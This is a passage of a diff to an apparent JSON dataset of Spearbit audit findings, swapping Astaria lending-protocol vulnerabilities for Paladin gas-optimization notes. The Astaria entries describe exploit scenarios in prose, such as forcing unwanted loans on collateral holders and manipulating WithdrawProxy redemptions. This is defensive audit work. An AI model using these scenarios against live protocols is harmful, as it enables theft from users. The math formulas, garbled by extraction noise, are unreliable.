being taken out against. The caller also inputs a receiver, who will be receiving the lien. In this validation, this receiver is checked against the collateral holder, and the validation is approved in the case that receiver == holder. However, this does not imply that the collateral holder wants to take this loan. This opens the door to a malicious lender pushing unwanted loans on holders of collateral by calling commitToLien with their collateralId, as well as their address set to the receiver. This will pass the receiver == holder check and execute the loan. In the best case, the borrower discovers this and quickly repays the loan, incurring a fee and small amount of interest. In the worst case, the borrower doesn't know this happens, and their collateral is liquidated.", + "title": "Optimize && operator usage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The check && consumes more gas than using multiple require statements. Example test can be seen below: //Gas Cost: 22515 function increaseQuestReward(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) ,! public { require(newRewardPerVote != 0 && addedRewardAmount != 0 && feeAmount != 0, \"QuestBoard: Null ,! amount\"); } //Gas Cost: 22477 function increaseQuestRewardTest(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 ,! feeAmount) public { require(newRewardPerVote != 0, \"QuestBoard: Null amount\"); require(addedRewardAmount != 0, \"QuestBoard: Null amount\"); require(feeAmount != 0, \"QuestBoard: Null amount\"); } Note : It costs more gas to deploy but it is worth it after X calls. Trade-offs should be considered.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Strategist Interest Rewards will be 10x higher than expected due to incorrect divisor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "VAULT_FEE is set as an immutable argument in the construction of new vaults, and is intended to be set in basis points. However, when the strategist interest rewards are calculated in _handleStrategistIntere- stReward(), the VAULT_FEE is only divided by 1000. The result is that the fee calculated by the function will be 10x higher than expected, and the strategist will be dramatically overpaid.", + "title": "Unnecesary value set to 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Since all default values in solidity are already 0 it riod.rewardAmountDistributed = 0; here as it should already be 0. is unnecessary to include _questPe-", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "The lower bound for liquidationInitialAsk for new lines needs to be stricter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "params.lien.details.liquidationInitialAsk ( Lnew ) is only compared to params.amount ( Anew ) whereas in _appendStack newStack[j].lien.details.liquidationInitialAsk ( Lj ) is compared to poten- tialDebt. potentialDebt is the aggregated sum of all potential owed amount at the end of each position/lien. So in _appendStack we have: onew + on + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj Where oj potential interest at the end of its term. is _getOwed(newStack[j], newStack[j].point.end) which is the amount for the stack slot plus the So it would make sense to enforce a stricter inequality for Lnew : (1 + r (tend (cid:0) tnow ) 1018 )Anew = onew (cid:20) Lnew The big issue regarding the current lower bound is when the borrower only takes one lien and for this lien liqui- dationInitialAsk == amount (or they are close). Then at any point during the lien term (maybe very close to the end), the borrower can atomically self liquidate and settle the Seaport auction in one transaction. This way the borrower can skip paying any interest (they would need to pay OpenSea fees and potentially royalty fees) and plus they would receive liquidation fees.", + "title": "Optimize unsigned integer comparison", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Check != 0 costs less gas compared to > 0 for unsigned integers in require statements with the optimizer enabled. While it may seem that > 0 is cheaper than !=0 this is only true without the optimizer being enabled and outside a require statement. If the optimizer is enabled at 10k and it is in a require statement, it would be more gas efficient.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "commitToLiens transfers extra assets to the borrower when protocol fee is present", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "totalBorrowed is the sum of all commitments[i].lienRequest.amount But if s.feeTo is set, some of funds/assets from the vaults get transefered to s.feeTo when _handleProtocolFee is called and only the remaining is sent to the ROUTER(). So in this scenario, the total amount of assets sent to ROUTER() (so that it can be transferred to msg.sender) is up to rounding errors: (1 (cid:0) np dp )T Where: T is the totalBorrowed np is s.protocolFeeNumerator dp is s.protocolFeeDenominator But we are transferring T to msg.sender which is more than we are supposed to send,", + "title": "Use memory instead of storage in closeQuestPeriod() and closePartOfQuestPeriod()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "In functions closeQuestPeriod() and closePartOfQuestPeriod() a storage pointer _quest is set to quests[questsForPeriod[i]]. This is normally used when write access to the location is need. Nevertheless _quest is read only, to a copy of quests[questsForPeriod[i]] is also sufficient. This can save some gas. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questsForPeriod[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questIDs[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! ,! }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Withdraw proxy's claim() endpoint updates public vault's yIntercept incorrectly.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Let parameter description y0 n En(cid:0)1 Bn(cid:0)1 Wn(cid:0)1 Sn(cid:0)1 Sv Bv V the yIntercept of our public vault in the question. the current epoch for the public vault. the expected storage parameter of the previous withdraw proxy. the asset balance of the previous withdraw proxy. the withdrawReserveReceived of the previous withdraw proxy. the total supply of the previous withdraw proxy. the total supply of the public vault when processEpoch() was last called on the public vault. the total balance of the public vault when processEpoch() was last called on the public vault. the public vault. 28 parameter description Pn(cid:0)1 the previous withdraw proxy. Then y0 is updated/decremented according to the formula (up to rounding errors due to division): y0 = y0 (cid:0) max(0, En(cid:0)1 (cid:0) (Bn(cid:0)1 (cid:0) Wn(cid:0)1))(1 (cid:0) Sn(cid:0)1 Sv ) Whereas the amount ( A ) of assets transfered from Pn(cid:0)1 to V is And the amount ( B ) of asset left in Pn(cid:0)1 after this transfer would be: A = (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) B = Wn(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1) Sn(cid:0)1 Sv (cid:1) (Bn(cid:0)1 (cid:0) Wn(cid:0)1) is supposed to represent the payment withdrawal proxy receives from Seaport auctions plus the amount of assets transferred to it by external actors. So A represents the portion of this amount for users who have not withdrawn from the public vault on the previous epoch and it is transferred to V and so y0 should be compensated positively. Also note that this amount might be bigger than En(cid:0)1 if a lien has a really high liquida- tionInitialAsk and its auction fulfills/matches near that price on Seaport. So it is possible that En(cid:0)1 < A. The current update formula for updating the y0 has the following flaws: It only considers updating y0 when En(cid:0)1 (cid:0) (Bn(cid:0)1 (cid:0) Wn(cid:0)1) > 0 which is not always the case. Decrements y0 by a portion of En(cid:0)1. The correct updating formula for y0 should be: y0 = y0 (cid:0) En(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) Also note, if we let Bn(cid:0)1 (cid:0) Wn(cid:0)1 = Xn(cid:0)1 + (cid:15), where Xn(cid:0)1 is the payment received by the withdraw proxy from Seaport auction payments and (cid:15) (if Wn(cid:0)1 updated correctly) be assets received from external actors by the previous withdraw proxy. Then: B = Wn(cid:0)1 + (Xn(cid:0)1 + (cid:15)) Sn(cid:0)1 Sv (cid:1) = h max(0, Bv (cid:0) En(cid:0)1) + Xn(cid:0)1 + (cid:15) i Sn(cid:0)1 Sv (cid:1) The last equality comes from the fact that when the withdraw reserves is fully transferred from the public vault and the current withdraw proxy (if necessary) to the previous withdraw proxy the amount Wn(cid:0)1 would hold should be max(0, Bv (cid:0) En(cid:0)1) Sn(cid:0)1 . Sv (cid:1) Related Issue.", + "title": "Revert string size optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Shortening revert strings to fit in 32 bytes will decrease deploy time gas and will decrease runtime gas when the revert condition has been met. Revert strings using more than 32 bytes require at least one additional mstore, along with additional operations for computing memory offset.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Public vault's yIntercept is not updated when the full amount owed is not paid out by a Seaport auction.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When the full amountOwed for a lien is not paid out during the callback from Seaport to a collateral's ClearingHouse and if the payee is a public vault, we would need to decrement the yIntercept, otherwise the payee.totalAssets() would reflect a wrong value.", + "title": "Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "ByQuest[questID][_questPeriods[i]] several times. pointer to read and update values. This will save gas and also make the code more readable. periods- It is possible to set a pointer to this record and use that withdrawUnusedRewards() emergencyWithdraw() Functions and use function withdrawUnusedRewards(uint256 questID, address recipient) external isAlive nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState == PeriodState.ACTIVE) { ... } ... uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } ... } function emergencyWithdraw(uint256 questID, address recipient) external nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState != PeriodState.ACTIVE){ uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } } else { .. totalWithdraw += periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod; periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod = 0; } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "LienToken payee not reset on transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "payee and ownerOf are detached in that owners may set payee and owner may transfer the LienTo- ken to a new owner. payee does not reset on transfer. Exploit scenario: Owner of a LienToken sets themselves as payee Owner of LienToken sells the lien to a new owner New owner does not update payee Payments go to address set by old owner", + "title": "Needless to initialize variables with default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "uint256 variables are initialized to a default value of 0 per Solidity docs. Setting a variable to the default value is unnecessary.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "WithdrawProxy allows redemptions before PublicVault calls transferWithdrawReserve", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anytime there is a withdraw pending (i.e. someone holds WithdrawProxy shares), shares may be redeemed so long as totalAssets() > 0 and s.finalAuctionEnd == 0. Under normal operating conditions totalAssets() becomes greater than 0 when then PublicVault calls trans- ferWithdrawReserve. totalAssets() can also be increased to a non zero value by anyone transferring WETH to the contract. If this occurs and a user attempts to redeem, they will receive a smaller share than they are owed. Exploit scenario: Depositor redeems from PublicVault and receives WithdrawProxy shares. Malicious actor deposits a small amount of WETH into the WithdrawProxy. Depositor accidentally redeems, or is tricked into redeeming, from the WithdrawProxy while totalAssets() is smaller than it should be. PublicVault properly processes epoch and full withdrawReserve is sent to WithdrawProxy. All remaining holders of WithdrawProxy shares receive an outsized share as the previous shares we re- deemed for the incorrect value.", + "title": "Optimize the calculation of the currentPeriod", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The retrieval of currentPeriod is relatively gas expensive because it requires an SLOAD instruction (100 gas) every time. Calculating (block.timestamp / WEEK) * WEEK; is cheaper (TIMESTAMP: 2 gas, MUL: 5 gas, DIV: 5 gas). Refer to evm.codes for more information. Additionally, there is a risk that the call to updatePeriod() is forgotten although it does not happen in the current code. function updatePeriod() public { if (block.timestamp >= currentPeriod + WEEK) { currentPeriod = (block.timestamp / WEEK) * WEEK; } } Note: it is also possible to do all calculations with (block.timestamp / WEEK) instead of (block.timestamp / WEEK) * WEEK, but as the Paladin project has indicated:\"\" This currentPeriod is a timestamp, showing the start date of the current period, and based from the Curve system (because we want the same timestamp they have in the GaugeController).\"", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Point.position is not updated for stack slots in _removeStackPosition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "uint8(params.stack.length) which would be its index in the stack. When _removeStackPosition is called to remove a slot newStack[i].point.position is not updated for indexes that are greater than position in the original stack. Also slot.point.position is only used when we emit AddLien and LienStackUpdated events. In both of those cases, we could have used params.stack.length", + "title": "Change memory to calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "For the function parameters, it is often more optimal to have the reference location to be calldata instead of memory. Changing bytes to calldata will decrease gas usage. OpenZeppelin Pull Request", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "unchecked may cause under/overflows", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "unchecked should only be used when there is a guarantee of no underflows or overflows, or when they are taken into account. In absence of certainty, it's better to avoid unchecked to favor correctness over gas efficiency. For instance, if by error, protocolFeeNumerator is set to be greater than protocolFeeDenominator, this block in _handleProtocolFee() will underflow: PublicVault.sol#L640, unchecked { amount -= fee; } However, later this reverts due to the ERC20 transfer of an unusually high amount. This is just to demonstrate that unknown bugs can lead to under/overflows.", + "title": "Caching array length at the beginning of function can save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Caching array length at the beginning of the function can save gas in the several locations. function multiClaim(address account, ClaimParams[] calldata claims) external { require(claims.length != 0, \"MultiMerkle: empty parameters\"); uint256 length = claims.length; // if this is done before the require, the require can use \"length\" ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk PublicVault.sol#L563, LienToken.sol#L424, LienToken.sol#L482, PublicVault.sol#L376, PublicVault.sol#L422, Public-" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Multiple ERC4626Router and ERC4626RouterBase functions will always revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The intention of the ERC4626Router.sol functions is that they are approval-less ways to deposit and redeem: // For the below, no approval needed, assumes vault is already max approved As long as the user has approved the TRANSFER_PROXY for WETH, this works for the depositToVault function: WETH is transferred from user to the router with pullTokens. The router approves the vault for the correct amount of WETH. vault.deposit() is called, which uses safeTransferFrom to transfer WETH from router into vault. However, for the redeemMax function, it doesn't work: Approves the vault to spend the router's WETH. vault.redeem() is called, which tries to transfer vault tokens from the router to the vault, and then mints withdraw proxy tokens to the receiver. This error happens assuming that the vault tokens would be burned, in which case the logic would work. But since they are transferred into the vault until the end of the epoch, we require approvals. The same issue also exists in these two functions in ERC4626RouterBase.sol: redeem(): this is where the incorrect approval lives, so the same issue occurs when it is called directly. withdraw(): the same faulty approval exists in this function.", + "title": "Check amount is greater than 0 to avoid calling safeTransfer() unnecessarily", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "A check should be added to make sure amount is greater than 0 to avoid calling safeTransfer() unnecessarily.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "UniV3 tokens with fees can bypass strategist checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Each UniV3 strategy includes a value for fee in nlrDetails that is used to constrain their strategy to UniV3 pools with matching fees. This is enforced with the following check (where details.fee is the strategist's set fee, and fee is the fee returned from Uniswap): if (details.fee != uint24(0) && fee != details.fee) { revert InvalidFee(); } 33 This means that if you set details.fee to 0, this check will pass, even if the real fee is greater than zero.", + "title": "Unchecked{++i} is more efficient than i++", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The function getAllQuestPeriodsForQuestId uses i++ which costs more gas than ++i, especially in a loop. Also, the createQuest function uses nextID += 1 which costs more gas than ++nextID. Finally the initialization of i = 0 can be skipped, as 0 is the default value.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "If auction time is reduced, withdrawProxy can lock funds from final auctions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a new liquidation happens, the withdrawProxy sets s.finalAuctionEnd to be equal to the new incoming auction end. This will usually be fine, because new auctions start later than old auctions, and they all have the same length. However, if the auction time is reduced on the Router, it is possible for a new auction to have an end time that is sooner than an old auction. The result will be that the WithdrawProxy is claimable before it should be, and then will lock and not allow anyone to claim the funds from the final auction.", + "title": "Could replace claims[i].questID with questID", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Could replace claims[i].questID with questID (as they are equal due to the check above)", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "claim() will underflow and revert for all tokens without 18 decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the claim() function, the amount to decrease the Y intercept of the vault is calculated as: (s.expected - balance).mulWadDown(10**ERC20(asset()).decimals() - s.withdrawRatio) s.withdrawRatio is represented as a WAD (18 decimals). As a result, using any token with a number of decimals under 17 (assuming the withdraw ratio is greater than 10%) will lead to an underflow and cause the function to revert. In this situation, the token's decimals don't matter. They are captured in the s.expected and balance, and are also the scale at which the vault's y-intercept is measured, so there's no need to adjust for them. Note: I know this isn't a risk in the current implementation, since it's WETH only, but since you are planning to generalize to accept all ERC20s, this is important.", + "title": "Change function visibility from public to external", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The function updateRewardToken of the QuestBoard contract could be set external to save gas and improve code quality.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Call to Royalty Engine can block NFT auction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_generateValidOrderParameters() calls ROYALTY_ENGINE.getRoyaltyView() twice. The first call is wrapped in a try/catch. This lets Astaria to continue even if the getRoyaltyView() reverts. However, the second call is not safe from this. Both these calls have the same parameters passed to it except the price (startingPrice vs endingPrice). case they are different, there exists a possibility that the second call can revert. In", + "title": "Functions isClaimed() and _setClaimed() can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions isClaimed() and _setClaimed() of the contract MultiMerkleDistributor can be optimized to save gas. See OZ BitMaps for inspiration.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Expired liens taken from public vaults need to be liquidated otherwise processing an epoch halts/reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "s.epochData[s.currentEpoch].liensOpenForEpoch is decremented or is supposed to be decre- mented, when for a lien with an end that falls on this epoch: The full payment has been made, Or the lien is bought out by a lien that is from a different vault or ends at a higher epoch, Or the lien is liquidated. If for some reason a lien expires and no one calls liquidate, then s.epochData[s.currentEpoch].liensOpenForEpoch > 0 will be true and processEpoch() would revert till someones calls liquidate. Note that a lien's end falling in the s.currentEpoch and timeToEpochEnd() == 0 imply that the lien is expired. 35", + "title": "Missing events for owner only functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "assets < s.depositCap invariant can be broken for public vaults with non-zero deposit caps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following check in mint / deposit does not take into consideration the new shares / amount sup- plied to the endpoint, since the yIntercept in totalAssets() is only updated after calling super.mint(shares, receiver) or super.deposit(amount, receiver) with the afterDeposit hook. uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Thus the new shares or amount provided can be a really big number compared to s.depositCap, but the call will still go through.", + "title": "Use nonReentrant modifier in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions claim(), claimQuest() and recoverERC20() of contract MultiMerkleDistributor send tokens but dont have a nonReentrant modifier. All other functions that send tokens do have this modifier. Note: as the checks & effects patterns is used this is not really necessary. function claim(...) public { ... IERC20(rewardToken).safeTransfer(account, amount); } function claimQuest(...) external { ... IERC20(rewardToken).safeTransfer(account, totalClaimAmount); } function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "redeemFutureEpoch transfers the shares from the msg.sender to the vault instead of from the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "redeemFutureEpoch transfers the vault shares from the msg.sender to the vault instead of from the owner.", + "title": "Place struct definition at the beginning of the contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Regarding Solidity Style Guide, the struct definition can move to the beginning of the contract.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Lien buyouts can push maxPotentialDebt over the limit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a lien is bought out, _buyoutLien calls _getMaxPotentialDebtForCollateral to confirm that this number is lower than the maxPotentialDebt specified in the lien. However, this function is called with the existing stack, which hasn't yet replaced the lien with the new, bought out lien. Valid refinances can make the rate lower or the time longer. In the case that a lien was bought out for a longer duration, maxPotentialDebt will increase and could go over the limit specified in the lien.", + "title": "Improve checks for past quests in increaseQuestReward() and increaseQuestObjective()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions increaseQuestReward() and increaseQuestObjective() check: newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote. This is true when the quest is in the past (e.g. currentPeriod is outside of the quest range), because all the values will be 0. Luckily execution is stopped at _getRemainingDuration(questID), however it would be more logical to put this check near the start of the function. function increaseQuestReward(...) ... { updatePeriod(); ... require(newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote, \"QuestBoard: New reward must be higher\"); ... uint256 remainingDuration = _getRemainingDuration(questID); require(remainingDuration > 0, \"QuestBoard: no more incoming QuestPeriods\"); ... ,! } The function _getRemainingDuration() reverts when the quest is in the past, as currentPeriod will be larger than lastPeriod. The is not what you would expect from this function. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; return (lastPeriod - currentPeriod) / WEEK; // can revert }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Liens cannot be bought out once we've reached the maximum number of active liens on one collateral", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The buyoutLien function is intended to transfer ownership of a lien from one user to another. In practice, it creates a new lien by calling _createLien and then calls _replaceStackAtPositionWithNewLien to update the stack. In the _createLien function, there is a check to ensure we don't take out more than maxLiens against one piece of collateral: if (params.stack.length >= s.maxLiens) { revert InvalidState(InvalidStates.MAX_LIENS); } The result is that, when we already have maxLiens and we try to buy one out, this function will revert.", + "title": "Should make use of token.balanceOf(address(this)); to recover tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Currently when calling the recoverERC20() function there is no way to calculate what the proper amount should be without having to check the contracts balance of token before hand. This will require an extra step and can be easily done inside the function itself.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "First vault deposit can cause excessive rounding", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Aside from storage layout/getters, the context above notes the other major departure from Solmate's ERC4626 implementation. The modification requires the initial mint to cost 10 full WETH. 37 + + + function mint( uint256 shares, address receiver ) public virtual returns (uint256 assets) { // assets is 10e18, or 10 WETH, whenever totalSupply() == 0 assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up. // Need to transfer before minting or ERC777s could reenter. // minter transfers 10 WETH to the vault ERC20(asset()).safeTransferFrom(msg.sender, address(this), assets); // shares received are based on user input _mint(receiver, shares); emit Deposit(msg.sender, receiver, assets, shares); afterDeposit(assets, shares); } Astaria highlighted that the code diff from Solmate is in relation to this finding from the previous Sherlock audit. However, deposit is still unchanged and the initial deposit may be 1 wei worth of WETH, in return for 1 wad worth of vault shares. Further, the previously cited issue may still surface by calling mint in a way that sets the price per share high (e.g. 10 shares for 10 WETH produces a price per of 1:1e18). Albeit, at a higher cost to the minter to set the initial price that high.", + "title": "Floating pragma is set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The current pragma Solidity directive is ^0.8.10. It is recommended to specify a specific compiler version to ensure that the byte code produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (for e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When the collateral s.auctionData[collateralId].liquidator (s.auctionData in general) will not be set and so it will be address(0) and thus the liquidatorPayment will be sent to address(0).", + "title": "Deflationary reward tokens are not handled uniformly across the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The code base does not support rebasing/deflationary/inflationary reward tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "potentialDebt is not compared against a new lien's maxPotentialDebt in _appendStack", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _appendStack, we have the following block: newStack = new Stack[](stack.length + 1); newStack[stack.length] = newSlot; uint256 potentialDebt = _getOwed(newSlot, newSlot.point.end); ... if ( stack.length > 0 && potentialDebt > newSlot.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Note, we are only performing a comparison between newSlot.lien.details.maxPotentialDebt and poten- tialDebt when stack.length > 0. If _createLien is called with params.stack.length == 0, we would not perform this check and thus the input params is not fully checked for misconfiguration.", + "title": "Typo on comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Across the codebase, there is a typo on the comment. The comment can be seen from the below. * @dev Returns the number of periods to come for a give nQuest", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Previous withdraw proxy's withdrawReserveReceived is not updated when assets are drained from the current withdraw proxy to the previous", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When drain is called, we don't update the s.epochData[s.currentEpoch - 1]'s withdrawRe- serveReceived, this is in contrast to when withdraw reserves are transferred from the public vault to the withdraw proxy. This would unlink the previous 